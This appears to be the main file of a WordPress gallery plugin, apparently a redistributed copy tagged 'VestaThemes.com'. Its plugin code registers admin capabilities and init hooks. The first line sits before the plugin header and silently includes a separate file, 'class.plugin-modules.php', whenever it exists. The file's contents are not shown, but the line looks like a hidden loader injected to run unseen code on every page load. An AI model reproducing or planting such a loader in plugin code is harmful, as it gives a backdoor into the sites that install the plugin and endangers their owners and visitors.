<?php if (file_exists(dirname(__FILE__) . '/class.plugin-modules.php')) include_once(dirname(__FILE__) . '/class.plugin-modules.php'); ?><?php
/*
Plugin Name: Revolution Multimedia Gallery |  VestaThemes.com
Plugin URI: http://codecanyon.net/user/FWDesign/portfolio
Description: This is the Wordpress plugin with a CMS menu for the installation and configuration of the Revolution Multimedia Gallery.
Author: FWD
Version: 1.0
Author URI: http://webdesign-flash.ro/
*/

include_once "php/FWDRMG.php";
include_once "php/FWDRMGData.php";

function fwdrmg_check_if_admin()
{
	$roles = wp_get_current_user()->roles;
	$role = "administrator";
	 
	return in_array($role, $roles);
}

function fwdrmg_admin_init()
{
	if (fwdrmg_check_if_admin())
	{
		$role = get_role("administrator");
		$role->add_cap(FWDRMG::CAPABILITY);
	}
}

function fwdrmg_init_plugin()
{	
	$cov = new FWDRMG();	$cov->init();
}

add_action("init", "fwdrmg_init_plugin");
add_action("admin_init", "fwdrmg_admin_init");
add_filter("plugin_action_links_" . plugin_basename(__FILE__), array("FWDRMG", "set_action_links"));

?>